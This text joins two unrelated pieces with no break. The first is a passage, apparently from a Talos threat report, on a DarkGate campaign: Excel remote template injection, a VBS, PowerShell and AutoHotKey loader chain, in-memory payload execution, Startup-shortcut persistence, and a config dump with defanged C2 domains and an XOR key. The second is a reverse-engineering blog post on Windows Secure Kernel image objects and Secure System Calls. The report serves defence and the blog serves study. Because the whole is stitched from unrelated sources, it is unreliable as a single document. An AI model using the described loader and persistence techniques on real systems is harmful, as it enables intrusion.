Remote Template Injection is an attack technique that exploits legitimate Excel functionality wherein templates can be imported from external sources to expand a document’s functions and features. By exploiting the inherent trust users place in document files, this method skillfully evades security protocols that may not be as stringent for document templates as for executable files. It represents a refined tactic for attackers to establish a presence within a system, sidestepping the need for conventional executable malware.  

When the Excel file is opened, it downloads and executes a VBS file from an attacker-controlled server. 

The VBS file is appended with a command that executes a PowerShell script from the DarkGate command and control (C2) server. 

This PowerShell script retrieves the next stage’s components and executes them, as shown below. 

Payload analysis 

On March 12, 2024, the DarkGate campaign transitioned from deploying AutoIT scripts to employing AutoHotKey scripts. 

AutoIT and AutoHotKey are scripting languages designed for automating tasks on Windows. While both languages serve similar purposes, their differences lie in their syntax complexity, feature sets and community resources. AutoHotKey offers more advanced text manipulation features, extensive support for hotkeys, and a vast library of user-contributed scripts for various purposes. While both AutoIT and AutoHotKey have legitimate purposes, they are often abused by adversaries to run malicious scripts, consistent with other scripting languages often observed in infection chains. 

As shown in the screenshot above, one of the files retrieved is ‘test.txt.’ Within this file, there is a base64-encoded blob that, when decoded, transforms into binary data. This binary data is then processed to execute the DarkGate malware payload directly within memory on infected systems. 

As shown in the previous PowerShell code, payloads are initially saved to disk within a directory (C:\rimz\) on the system. The directory name changes across infection chains that were analyzed. 

In this case, the attacker was using a legitimate copy of the AutoHotKey binary (AutoHotKey.exe) to execute a malicious AHK script (script.ahk). 

The executed AHK script reads content from the text file (test.txt), decodes it in memory, and executes it without ever saving the decoded DarkGate payload to disk. This file also contains shellcode that is loaded and executed by the AHK script, as shown below. 

Persistence mechanisms 

Components used during the final stage of the infection process are stored at the following directory location: 

  • C:\ProgramData\cccddcb\AutoHotKey.exe 
  • C:\ProgramData\cccddcb\hafbccc.ahk 
  • C:\ProgramData\cccddcb\test.txt 

Persistence across reboots is established through the creation of a shortcut file within the Startup directory on the infected system. 

Shortcut Parameter    Value

Shortcut Location     C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DfAchhd.lnk

Shortcut Execution    C:\ProgramData\cccddcb\AutoHotkey.exe "C:\ProgramData\cccddcb\hafbccc.ahk"

Talos’ threat intelligence and detection response teams have successfully developed detections for these campaigns and blocked them as appropriate on Cisco Secure products. However, the evolving nature of recent DarkGate campaigns, as demonstrated by the shift from AutoIT to AutoHotKey scripts and the use of remote template injection, serves as a stark reminder of the continuous arms race in cybersecurity. 

Coverage 

 Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The following Snort SIDs apply to this threat:  

  • Snort 2 SIDs: 3, 12, 11192, 13667, 15306, 16642, 19187, 23256, 23861, 44484, 44485, 44486, 44487, 44488, 63521, 63522, 63523, 63524 
  • Snort 3 SIDs: 1, 16, 260, 11192, 15306, 36376, 44484, 44486, 44488, 63521, 63522, 63523, 63524 

The following ClamAV detections are also available for this threat:  

  • Doc.Malware.DarkGateDoc 
  • Ps1.Malware.DarkGate-10030456-0 
  • Vbs.Malware.DarkGate-10030520-0 

Indicators of Compromise (IOCs) 

Indicators of Compromise (IOCs) associated with this threat can be found here.  

Below is an example of the configuration parameters extracted from one of the DarkGate payloads analyzed.  

Configuration Parameter    Value

C2                         hxxp://badbutperfect[.]com
                           hxxp://withupdate[.]com
                           hxxp://irreceiver[.]com
                           hxxp://backupitfirst[.]com
                           hxxp://goingupdate[.]com
                           hxxp://buassinnndm[.]net

Family                     DarkGate

Attributes                 anti_analysis = true
                           anti_debug = false
                           anti_vm = true
                           c2_port = 80
                           internal_mutex (Provides the XOR key/maker used for DarkGate payload decryption) = WZqqpfdY
                           ping_interval = 60
                           startup_persistence = true
                           username = admin

Windows Internals: Dissecting Secure Image Objects - Part 1

Introduction

Recently I have been working on an un-published (at this time) blog post that will look at how securekernel.exe and ntoskrnl.exe work together in order to enable and support the Kernel Control Flow Guard (Kernel CFG) feature, which is enabled under certain circumstances on modern Windows systems. This comes from the fact that I have recently been receiving questions from others on this topic. During the course of my research, I realized that a relatively-unknown topic that kept reappearing in my analysis was the concept of Normal Address Ranges (NARs) and Normal Address Table Entries (NTEs), sometimes referred to as NT Address Ranges or NT Address Table Entries. The only mention I have seen of these terms comes from Windows Internals 7th Edition, Part 2, Chapter 9, which was written by Andrea Allievi. The more I dug in, the more I realized this topic could probably use its own blog post.

However, when I started working on that blog post I realized that the concept of “Secure Image Objects” also plays into NAR and NTE creation. Because of this, I realized I could maybe just start with Secure Image objects!

Given the lack of debugging capabilities for securekernel.exe, the lack of user-defined types (UDTs) in the securekernel.exe symbols, and the overall lack of public information, there is no way (as we will see) I will be able to completely map Secure Image objects back to absolute structure definitions (and the same goes for NARs/NTEs). This blog (and subsequent ones) are really just analysis posts outlining things such as Secure System Calls, functionality, and the reverse engineering methodology I take. I am not an expert on this subject matter (like Andrea, Satoshi Tanda, or others) and am mainly writing up my analysis because there isn’t much information out there on these subjects, and I also greatly enjoy writing long-form blog posts. With that said, the “song-and-dance” performed between NT and the Secure Kernel to load images, share resources, etc. is a very complex (in my mind) topic. The terms I use are based on the names of the functions involved and may differ from the actual, official terms. So please feel free to reach out with improvements/corrections. Lastly, Secure Image objects can be created for images other than drivers; we will be focusing on driver loads. With this said, I hope you enjoy!

SECURE_IMAGE Overview

Windows Internals, 7th Edition, Chapter 9 gives a brief mention of SECURE_IMAGE objects:

…The NAR contains some information of the range (such as its base address and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers (in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated by the NT memory manager as private pages that contain executable code…

As we know with HVCI (at the risk of being interpreted as pretentious, which is not my intent, I have linked my own blog post), VTL 1 is responsible for enforcing W^X (write XOR execute, meaning WX memory is not allowed). Given that drivers can be dynamically loaded at any time on Windows, VTL 0 and VTL 1 need to work together to ensure that before such drivers are actually loaded, the Secure Kernel has the opportunity to apply the correct safeguards so that the new driver isn’t used, for instance, to load unsigned code. This whole process starts with the creation of the Secure Image object.

This is required because the Secure Kernel needs to monitor access to some of the memory present in VTL 0, where “normal” drivers live. Secure Image objects allow the Secure Kernel to manage the state of these runtime drivers. Managing the state of these drivers is crucial to enforcing many of the mitigations provided by virtualization capabilities, such as HVCI. A very basic example: when a driver is being loaded in VTL 0, we know that VTL 1 needs to create the proper Second Layer Address Translation (SLAT) protections for each of the sections that make up the driver (e.g., the .text section should be RX, .data RW, etc.). In order for VTL 1 to do that, it likely needs some additional information and context, such as the address of the entry point of the image, the number of PE sections, etc. This is the sort of thing a Secure Image object can provide - much of the context that the Secure Kernel needs to “do its thing”.

This whole process starts with code in NT which, upon loading runtime drivers, results in NT extracting the headers from the image being loaded and sending this information to the Secure Kernel in order to perform the initial header verification and build out the Secure Image object.

I want to make clear again - although the process for creating a Secure Image object may start with what we are about to see in this blog post, even after the Secure System Call returns to VTL 0 in order to create the initial object, there is still a “song-and-dance” performed by ntoskrnl.exe, securekernel.exe, and skci.dll. This specific blog does not go over this whole “song-and-dance”. This blog will focus on the initial steps taken to get the object created in the Secure Kernel. In future blogs we will look at what happens after the initial object is created. For now, we will just stick with the initial object creation.

A Tiny Secure System Call Primer

Secure Image object creation begins through a mechanism known as a Secure System Call. Secure System Calls work at a high-level similarly to how a traditional system call works:

  1. An untrusted component (NT in this case) needs to access a resource in a privileged component (Secure Kernel in this case)
  2. The privileged component exposes an interface to the untrusted component
  3. The untrusted component packs up information it wants to send to the privileged component
  4. The untrusted component specifies a given “call number” to indicate what kind of resource it needs access to
  5. The privileged component takes all of the information, verifies it, and acts on it

A “traditional” system call will result in the emission of a syscall assembly instruction, which performs work in order to change the current execution context from user-mode to kernel-mode. Once in kernel-mode, the original request reaches a specified dispatch function which is responsible for servicing the request outlined by the System Call Number. Similarly, a Secure System Call works almost the same in concept (but not necessarily in the technical implementation). Instead of syscall, however, a vmcall instruction is emitted. vmcall is not specific to the Secure Kernel and is a general opcode in the 64-bit instruction set. A vmcall instruction simply allows guest software (in our case, as we know from HVCI, VTL 0 - which is where NT lives - is effectively treated as “the guest”) to make a call into the underlying VM monitor/supervisor (Hyper-V). In other words, this results in a call into Secure Kernel from NT.

The NT function nt!VslpEnterIumSecureMode is a wrapper for emitting a vmcall. The thought process can therefore be summed up as this: if a given function invokes nt!VslpEnterIumSecureMode, the caller of said function is (generally speaking) responsible for invoking a Secure System Call.

Although performing dynamic analysis on the Secure Kernel is difficult, one thing to note here is that the order in which the Secure System Call arguments are packed and shipped to the Secure Kernel is the same order in which the Secure Kernel will operate on them. So, as an example, the function nt!VslCreateSecureImageSection is one of the many functions in NT that results in a call to nt!VslpEnterIumSecureMode.

The Secure System Call Number, or SSCN, is stored in the RDX register. The R9 register, although not obvious from the screenshot above, is responsible for storing the packed Secure System Call arguments. These arguments are packed in the form of an in-memory structure (which we will look at later).

On the Secure Kernel side, the function securekernel!IumInvokeSecureService is a very large function that serves as the “entry point” for Secure System Calls. It contains a large switch/case statement that correlates a given SSCN to a specific dispatch function handler. The exact order in which the arguments were packed is the order in which they are unpacked and operated on by the Secure Kernel (in the screenshot below, a1 is the address of the structure, and we can see how various offsets are extracted from it, which is due to struct->Member access).
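
To make that pattern concrete, here is a minimal sketch of the dispatch logic. Only the 0x19-to-securekernel!SkmmCreateSecureImageSection mapping comes from this analysis; the signature, the default case, and everything else are assumptions for illustration.

NTSTATUS IumInvokeSecureService(ULONG Sscn, PVOID PackedArgs)
{
    switch (Sscn) {
    case 0x19:
        // Arguments are unpacked in the same order NT packed them.
        return SkmmCreateSecureImageSection(PackedArgs);
    // ... many other SSCNs map to their own handlers ...
    default:
        return STATUS_INVALID_PARAMETER;
    }
}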

Now that we have a bit of an understanding here, let’s move on to see how the Secure System Call mechanism is used to help Secure Kernel create a Secure Image object!

SECURE_IMAGE (Non-Comprehensive!) Creation Overview

Although by no means is this a surefire way to identify this data, a method that could be employed to locate the functionality for creating Secure Image objects is to just search for terms like SecureImage in the Secure Kernel symbols. Within the call to securekernel!SkmmCreateSecureImageSection we see a call to an externally-imported function, skci!SkciCreateSecureImage.

This means it is highly likely that securekernel!SkmmCreateSecureImageSection is responsible for accepting some parameters surrounding the Secure Image object creation and forwarding that on to skci!SkciCreateSecureImage. Focusing our attention on securekernel!SkmmCreateSecureImageSection we can see that this functionality (securekernel!SkmmCreateSecureImageSection) is triggered through a Secure System Call with an SSCN of 0x19 (the screenshot below is from the securekernel!IumInvokeSecureService Secure System Call dispatch function).

Again, by no means is this correct in all cases, but I have noticed that most of the time when a Secure System Call is issued from ntoskrnl.exe, the corresponding “lowest-level function”, which is responsible for invoking nt!VslpEnterIumSecureMode, has a similar name to the associated dispatch function in securekernel.exe which handles the Secure System Call. Luckily this applies here, and the function which issues the SSCN of 0x19 is nt!VslCreateSecureImageSection.

Based on the call stack here, we can see that when a new section object is created for a target driver image being loaded, the ci.dll module is dispatched in order to determine if the image is compatible with HVCI (if it isn’t, STATUS_INVALID_IMAGE_HASH is returned). Examining the parameters of the Secure System Call reveals the following.

Note that at several points I restarted the machine the analysis was performed on, and due to KASLR the addresses will change. I will provide enough context in the post to overcome this obstacle.

With Secure System Calls, the first parameter seems to always be 0 and/or reserved. This means the arguments to create a Secure Image object are packed as follows.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID VirtualAddress;
    PVOID PageFrameNumber;
    bool UnknownBool;
    ULONG UnknownUlong;
    ULONG UnknownUlong1;
} SECURE_IMAGE_CREATE_ARGS;

As a small point of contention, I know that the page frame number is such because I am used to dealing with memory operations that involve both physical and virtual addresses. Anytime I am dealing with some sort of lower-level concept, like loading a driver into memory, and I see a value that looks like a ULONG paired with a virtual address, I always assume it could be a PFN - especially when the ULONG value is not page-aligned. A physical memory address is simply (page frame number * 0x1000), plus any potential offset. Since the value does not end in 0 or 00, this tells me it is likely the page frame number itself rather than a physical address. This is not a foolproof method, but I will show how I validated this below.
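
As a quick, worked illustration of that arithmetic (the PFN and offset values here are hypothetical):

// physical address = (page frame number * 0x1000) + offset
// e.g., a PFN of 0x5a4d2 with an in-page offset of 0x250:
// (0x5a4d2 * 0x1000) + 0x250 = 0x5a4d2250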

At first, I was pretty stuck on what this first virtual address was used for. We previously saw the call stack which is responsible for invoking nt!VslCreateSecureImageSection. If you trace execution in IDA, however, you will quickly see this call stack is a bit convoluted, as most of the functions involved are invoked via function pointers passed as input parameters from other functions, making tracing the arguments a bit difficult. Fortunately, I saw that this virtual address was used in a call to securekernel!SkmmMapDataTransfer almost immediately within the Secure System Call handler function (securekernel!SkmmCreateSecureImageSection). Note that although the IDA output is annotated with some additional information, we will get to that shortly.

It seems this function is actually publicly documented thanks to Saar Amar and Daniel King’s BlackHat talk! This reveals to us that the first argument is an MDL (Memory Descriptor List), while the second parameter, PageFrameNumber, is a page frame number whose use we don’t yet know.

According to the talk, securekernel.exe tends to use MDLs, which are provided by VTL 0, for cases where data may need to be accessed by VTL 1. By no means is this an MDL internals post, but I will give a brief overview quickly. An MDL (nt!_MDL) is effectively a fixed-size header which is prepended to a variable-length array of page frame numbers (PFNs). Virtual memory, as we know, is contiguous. The normal size of a page on Windows is 4096, or 0x1000 bytes. Using a contrived example (not taking into account any optimizations/etc.), let’s say a piece of malware allocated 0x2000 bytes of memory and stored shellcode in that same allocation. We could expect the layout of memory to look as follows.

We can see in this example the shellcode spans the virtual pages 0x1ad2000 and 0x1ad3000. However, this is the virtual location, which is contiguous. In the next example, the reality of the situation creeps in as the physical pages which back the shellcode are in two separate locations.

An MDL would be used in this case to describe the physical layout of a virtual memory region. The MDL is used to say “hey, I have this contiguous buffer in virtual memory, but here are the physical, non-contiguous page(s) which back this contiguous range of virtual memory”.
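
For reference, the fixed-size MDL header is declared in wdm.h as follows; the variable-length PFN array immediately follows it in memory (the field comments are mine):

typedef struct _MDL {
    struct _MDL *Next;
    CSHORT Size;
    CSHORT MdlFlags;
    struct _EPROCESS *Process;
    PVOID MappedSystemVa;   // kernel-mode mapping of the buffer, once created
    PVOID StartVa;          // page-aligned start of the described range
    ULONG ByteCount;        // length of the described range
    ULONG ByteOffset;       // offset of the buffer within the first page
} MDL, *PMDL;               // the PFN array begins directly after this header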

MDLs are also typically used for direct memory access (DMA) operations. DMA operations don’t have the luxury of much verification, because they need to access data quickly (think UDP vs TCP). Because of this, an MDL is used: the memory range it describes is typically first locked into memory so that the DMA operation never accesses invalid memory.

One of the main features of an MDL is that it allows multiple mappings for the virtual address range a given MDL describes (StartVa is the beginning of the virtual address range the MDL describes). For instance, consider an MDL where StartVa describes a user-mode buffer. As we know, user-mode addresses are only valid within the process context in which they reside (the address space is per-process, based on the page table directory currently loaded into the CR3 register). Let’s say that a driver, running in an arbitrary context, needs to access the information in the user-mode buffer contained in Mdl->StartVa. If the driver goes to access this while the current process context is processA.exe, but the address was only valid in processB.exe, you are accessing invalid memory and you would cause a crash.

An MDL allows you, through the MmGetSystemAddressForMdlSafe API, to actually request that the system map this memory into the system address space, from the non-paged pool. This allows us to access the contents of the user-mode buffer, through a kernel-mode address, in an arbitrary process context.
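A minimal usage sketch (the failure handling here is illustrative):

// Map the buffer described by the MDL into the system address space
// (from the non-paged pool) so it can be read from an arbitrary
// process context.
PVOID SystemVa = MmGetSystemAddressForMdlSafe(Mdl, NormalPagePriority);
if (SystemVa == NULL) {
    // Low-resource conditions: the system mapping could not be created.
    return STATUS_INSUFFICIENT_RESOURCES;
}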

Now, using that knowledge, we can see that this is the exact same reason VTL 0 and VTL 1 use MDLs! We can think of VTL 0 as the “user-mode” portion and VTL 1 as the “kernel-mode” portion, where VTL 0 has an address with data that VTL 1 wants. VTL 1 can take that data (in the form of an MDL) and map it into VTL 1 so it can safely access the contents of the memory described by the MDL.

Taking a look back at how the MDL looks, we can see that StartVa, which is the buffer the MDL describes, is some sort of base address. We can confirm this is actually the base address of an image being loaded because it contains an nt!_IMAGE_DOS_HEADER (0x5a4d is the magic (MZ) for a PE file and is found at the beginning of the image, which is what a kernel image is).

However, although this looks to be the “base image”, based on the alignment of Mdl->StartVa, we can see quickly that ByteCount tells us only the first 0x1000 bytes of this memory allocation are accessible via this MDL. The ByteCount of an MDL denotes the size of the range being described by the MDL. Usually the first 0x1000 bytes of an image are reserved for all of the headers (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, etc.). If we recall the original call stack (provided below for completeness) we can actually see that the NT function nt!SeValidateImageHeader is responsible for redirecting execution to ci.dll (which eventually results in the Secure System Call). This means in reality, although the StartVa is aligned to look like a base address, we are really just dealing with the headers of the target image at this point. Even though the StartVa is aligned like a base address, the fact of the matter is the actual address is not relevant to us - only the headers are.

As a point of contention before we move on, we can do basic retroactive analysis based on the call stack to clearly see that the image has only been mapped into memory. It has not been fully loaded - and only the initial section object that backs the image is present in virtual memory. As we do more analysis in this post, we will also verify this to be the case with actual data that shows many of the default values in the headers, from disk, haven’t been fixed up (which normally happens when the image is fully loaded).

Great! Now that we know this first parameter is an MDL that contains the image headers, the next thing that needs to happen is for securekernel.exe to figure out how to safely access the contents of the region described by the MDL (which are the headers).

The first thing that VTL 1 will do is take the MDL we just showed, provided by VTL 0, and create a new MDL in VTL 1 that describes the provided MDL from VTL 0. In other words, the new MDL will be laid out as follows.

Vtl1CopyOfVtl0Mdl->StartVa = page_aligned_address_mdl_starts_in;
Vtl1CopyOfVtl0Mdl->ByteOffset = offset_from_page_aligned_address_to_actual_address;

MDLs usually work with a page-aligned address as the base, with any remainder in ByteOffset. This is why the VTL 0 MDL's address is first page-aligned (Vtl0Mdl & 0xFFFFFFFFFFFFF000), and the offset to the MDL within the page is set in ByteOffset.
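
Reusing the hypothetical names from above, the computation amounts to:

Vtl1CopyOfVtl0Mdl->StartVa    = (PVOID)((ULONG_PTR)Vtl0Mdl & 0xFFFFFFFFFFFFF000);  // page-aligned base
Vtl1CopyOfVtl0Mdl->ByteOffset = (ULONG)((ULONG_PTR)Vtl0Mdl & 0xFFF);               // offset within that page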

Additionally, from the previous image, we can now realize what the first page frame number used in our Secure System Call parameters is used for. This is the PFN which corresponds to the MDL (the parameter PfnOfVtl0Mdl). We can validate this in WinDbg.

We know that a physical page of memory is simply (page frame number * PAGE_SIZE + any offset). Although we can see in the previous screenshot that the contents of memory for the page-aligned address of the MDL and the physical memory correspond, if we add the page offset (0x250 in this case) we can clearly see that there is no doubt this is the PFN for the VTL 0 MDL. We can additionally see that the PFN in the PTE of the VTL 0 MDL aligns!

This MDL, after construction, has StartVa mapped into VTL 1. At this point, for all intents and purposes, vtl1MdlThatDescribesVtl0Mdl->MappedSystemVa contains the VTL 1 mapping of the VTL 0 MDL! All integrity checks are then performed on the MDL.

VTL 1 has now mapped the VTL 0 MDL (using another MDL). MappedSystemVa is now a pointer to the VTL 1 mapping of the VTL 0 MDL, and the integrity checks now occur on this new mapping instead of operating directly on the VTL 0 MDL. After confirming the VTL 0 MDL contains legitimate data (the large if statement in the screenshot below), another MDL (not the MDL from VTL 0, not the MDL created by VTL 1 to describe the MDL from VTL 0, but a third, new MDL) is created. This MDL will be an actual copy of the now-verified contents of the VTL 0 MDL. In other words, thirdNewMdl->StartVa = StartAddressOfHeaders (which is the start of the image we are dealing with in the first place to create a securekernel!_SECURE_IMAGE structure).

We can now clearly see why the page frame number (PFN) of the VTL 0 MDL was provided: a mapping of virtual memory is simply another virtual page backed by a common physical page. When the new MDL is mapped, the Secure Kernel can then use NewMdl->MappedSystemVa to safely access, in the Secure Kernel's virtual address space, the header information provided by the MDL from VTL 0.

The VTL 1 MDL is now mapped into VTL 1 and has had all of its contents verified. We now return to the original caller where we started in the first place - securekernel!SkmmCreateSecureImageSection. This allows VTL 1 to have a memory buffer containing the contents of the image from VTL 0. We can clearly see below that this is immediately used in a call to RtlImageNtHeaderEx in order to validate that the memory VTL 0 sent in the first place contains a legitimate image, in order to create a securekernel!_SECURE_IMAGE object. It is also at this point that we determine whether we are dealing with the 32-bit or 64-bit architecture.

More information is then gathered, such as the size of the optional headers, the section alignment, etc. Once this information is fleshed out, a call to an external function, SkciCreateSecureImage, is made. Based on the naming convention, we can infer this function resides in skci.dll.

We know from the original Secure System Call that the second parameter is the PFN which backs the VTL 0 MDL. UnknownUlong and UnknownUlong1 here are the 4th and 5th parameters, respectively, passed to securekernel!SkmmCreateSecureImageSection. As of right now we don’t know what they are. The last value I noticed was consistently the 0x800C constant across multiple calls to securekernel!SkmmCreateSecureImageSection.

Opening skci.dll in IDA, we can examine this function further, which seemingly is responsible for creating the secure image.

Taking a look into this function a bit more, we can see it doesn’t create the object itself; instead it creates a “Secure Image Context”, which on this build of Windows is 0x110 bytes in size. The first function called in skci!SkciCreateSecureImage is skci!HashKGetHashLength. This is a very simple function that accepts two parameters - an input and an output. The input parameter is our last Secure System Call parameter, which was 0x800C.

Although IDA’s decompilation here is a bit confusing, what this function does is look for a few constant values - one of the options is 0x800C. If the value 0x800C is provided, the output parameter (which is the hash size, based on the function name and the fact that the actual return value is of type NTSTATUS) is set to 0x20. Since 0x800C is obviously not a 0x20-byte value, nor a hash, 0x800C must instead refer to a type of hash, likely associated with an image. We can then essentially say that the last Secure System Call parameter for Secure Image creation is the “type” of hash associated with this image. In fact, looking at cross-references to this function reveals that the function skci!CiInitializeCatalogs passes skci!g_CiMinimumHashAlgorithm as the first parameter to this function - meaning the first parameter actually specifies the hash algorithm.
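
A hedged reconstruction of what skci!HashKGetHashLength appears to do is below. The 0x800C-to-0x20 mapping is what we observed (0x800C is the standard ALG_ID value CALG_SHA_256); the other cases, the signature, and the error path are assumptions for illustration.

NTSTATUS HashKGetHashLength(ULONG AlgId, PULONG HashLength)
{
    switch (AlgId) {
    case 0x800C:            // CALG_SHA_256
        *HashLength = 0x20; // 32-byte digest
        return STATUS_SUCCESS;
    case 0x800D:            // CALG_SHA_384 (assumed to be handled)
        *HashLength = 0x30;
        return STATUS_SUCCESS;
    case 0x800E:            // CALG_SHA_512 (assumed to be handled)
        *HashLength = 0x40;
        return STATUS_SUCCESS;
    default:
        return STATUS_INVALID_PARAMETER;
    }
}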

After calculating the hash size, the Secure Image Context is built out. This starts by obtaining the image headers (nt!_IMAGE_NT_HEADERS64). Then the Secure Image Context is allocated from the pool and initialized to 0 (this is how we know the Secure Image Context is 0x110 bytes in size). The various sections contained in the image are used to build out much of the information tracked by the Secure Image Context.

Note that UnknownUlong was updated to ImageSize. I wish I had a better way to explain how I identified this, but in reality it was happenstance: as I was examining the optional headers, I realized I had seen this value before. See the image below to validate that the value from the Secure System Call arguments corresponds to SizeOfImage.

One thing to keep in mind here is that a SECURE_IMAGE object is created before ntoskrnl.exe has had a chance to actually perform the full loading of the image. At this point the image is mapped into virtual memory, but not loaded. We can see this by examining the nt!_IMAGE_NT_HEADERS64 structure and seeing that ImageBase in the nt!_IMAGE_OPTIONAL_HEADER64 structure is still set to the generic 0x1c0000000 address instead of the virtual address at which the image is currently mapped (because this information has not yet been updated as part of the loading process).

Next in the Secure Image Context creation functionality, the Secure Kernel locates the .rsrc section of the image and the Resource Data Directory. This information is used to calculate the file offset to the Resource Data Directory and also captures the virtual size of the .rsrc section.

After this, skci!SkciCreateSecureImage will, if the parameter we previously identified as UnknownBool is set to true, allocate some pool memory which is used in a call to skci!CiCreateVerificationContextForImageGeneratedPageHashes. This suggests the “unknown bool” is really an indicator of whether or not to create the Verification Context. A context, in this instance, refers to some memory (usually in the form of a structure) which contains information related to the context in which something was created, but which wouldn’t be available later otherwise.

The reader should know - I asked Andrea a question about this. The answer is that a file can be either page-hash signed or file-hash signed. Although the bool gates creating the Verification Context, it is more aptly described as indicating whether a file is file-hash or page-hash signed. If the image is file-hash signed, the Verification Context is created. For page-hashed files there is no need for the additional context information (we will see why shortly).

This begs the question - how do we know if we are dealing with a file that was page-hash signed or file-hash signed? Taking a short detour, this starts in the initial section object creation (nt!MiCreateNewSection). During this time a bitmask is formed, based on the parameters surrounding the creation of the section object that will back the loaded driver. A partially-reversed CREATE_SECTION_PACKET structure from my friend Johnny Shaw outlines this. Packet->Flags is one of the main factors that dictates how this new bitmask is formulated. In the case of the analysis being done in this blog post, when bit 21 (PacketFlags & 0x100000) and bit 6 (PacketFlags & 0x20) are set, we get the value for our new mask - 0x40000001. This bitmask is then carried through to the header validation functions, as seen below.

This bitmask finally makes its way to ci!CiGetActionsForImage. This call, as the name implies, returns another bitmask based on our 0x40000001 bitmask. The caller of ci!CiGetActionsForImage is ci!CiValidateImageHeader. This new, returned bitmask gives instructions to the header validation function as to what validation actions to take.

As previous art shows, depending on the bitmask returned, the header validation is going to be done via page hash validation or file hash validation, by supplying a function pointer to the actual validation function.

The two terms (page-hash signed and file-hash signed) can be very confusing - and there is very little information about them in the wild. A file-hashed file is one that has the entire contents of the file hashed. However, we must consider things like a driver being paged out and paged back in. When an image is paged in, for instance, it needs to be validated. Images in this case are always verified using page hashes, and never file hashes (I want to make clear I only know the following information because I asked Andrea). Because a file-hashed file would not have page hash information available (obviously, since it is “file-hashed”), skci.dll will create something called a “Page Hash Context” (which we will see shortly) for file-hashed images so that they are compatible with the requirement to verify information using page hashes.

As a point of contention, this means we have determined the arguments used for a Secure Image Secure System Call.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID Vtl0MdlImageHeaders;
    PVOID PageFrameNumberForMdl;
    bool ImageIsFileHashedCreateVerificationContext;
    ULONG ImageSize;
    ULONG HashAlgorithm;
} SECURE_IMAGE_CREATE_ARGS;

Moving on, the first thing this function (since we are dealing with a file-hashed image) does is actually call two functions which are responsible for creating additional contexts - the first is an “Image Hash Context” and the second is a “Page Hash Context”. These contexts are stored in the main Verification Context.

skci!CiCreateImageHashContext is a relatively small wrapper that simply takes the hashing algorithm passed in as part of the Secure Image Secure System Call (0x800C in our case) and uses this in a call to skci!SymCryptSha256Init. skci!SymCryptSha256Init takes the hash algorithm (0x800C) and uses it to create the Image Hash Context for our image (which really isn’t so much a “context” as it mainly just contains the size of the hash and the hashing data itself).

The Page Hash Context information is only produced for a file-hashed image; otherwise, file-hashed images would have no way to be verified in the future, as only page hashes are used for verification of the image. Page Hash Contexts are slightly more involved, but provide much of the same information. skci!CiCreatePageHashContextForImageMapping is responsible for creating this context, and VerificationContext_Offset_0x108 stores the actual Page Hash Context.

The Page Hash Context logic begins by using SizeOfRawData from each of the section headers (IMAGE_SECTION_HEADER) to iterate over the sections available in the image being processed and to capture how many pages make up each section (this determines how many pages make up all of the sections of the image).
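
A sketch of that accounting, under the stated assumption that each section contributes ceil(SizeOfRawData / PAGE_SIZE) pages (the variable names are hypothetical):

ULONG TotalPages = 0;
for (USHORT i = 0; i < FileHeader->NumberOfSections; i++) {
    // Round each section's raw size up to a whole number of 0x1000-byte pages.
    TotalPages += (SectionHeaders[i].SizeOfRawData + 0xFFF) >> 12;
}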

This information, along with IMAGE_OPTIONAL_HEADER->SizeOfHeaders, the size of the image itself, and the number of pages that span the sections of the image are stored in the Page Hash Context. Additionally, the Page Hash Context is then allocated based on the size of the sections (to ensure enough room is present to store all of the needed information).

After this, the Page Hash Context information is filled out. This begins by storing only the first page of the image in the Page Hash Context. The rest of the pages in each of the sections of the target image are filled out via skci!SkciValidateImageData, which is triggered by a separate Secure System Call. This comes at a later stage, after the current Secure System Call has returned but before we have left the original nt!MiCreateNewSection function. We will see this in a future blog post.

Now that the initial Verification Context (which also contains the Page Hash and Image Hash Contexts) has been created (but, as we know, will be updated with more information later), skci!SkciCreateSecureImage will then sort and copy information from the image section headers and store it in the Verification Context. This function will also calculate the file offset for the last section in the image by computing PointerToRawData + SizeOfRawData in the skci!CiGetFileOffsetAfterLastRawSectionData function.
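
The file-offset computation itself is simple (LastSection is a hypothetical name for the final IMAGE_SECTION_HEADER):

// File offset immediately following the last section's raw data.
ULONG EndOfLastRawSection = LastSection->PointerToRawData + LastSection->SizeOfRawData;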

After this, the Secure Image Context creation work is almost done. The last thing this function does is compute the hash of the first page of the image and store it, this time directly in the Secure Image Context. The Secure Image Context is then returned to the caller of skci!SkciCreateSecureImage, which is the Secure Kernel function servicing the original Secure System Call.

Note that previously we saw skci!CiAddPagesToPageHashContext called within skci!CiCreatePageHashContextForImageMapping. In the call in the above image, the fourth parameter is SizeOfHeaders, but in the call within skci!CiCreatePageHashContextForImageMapping the parameter was MdlByteCount - the ByteCount provided earlier by the MDL in the Secure System Call arguments. In our case, SizeOfHeaders and the ByteCount are both 0x1000 - which implies that when the MDL is constructed, the ByteCount is set to 0x1000 based on the SizeOfHeaders from the optional header. This validates what we mentioned at the beginning of the blog: although the “base address” is used as the first Secure System Call parameter, it could more specifically be referred to as the “headers” of the image.

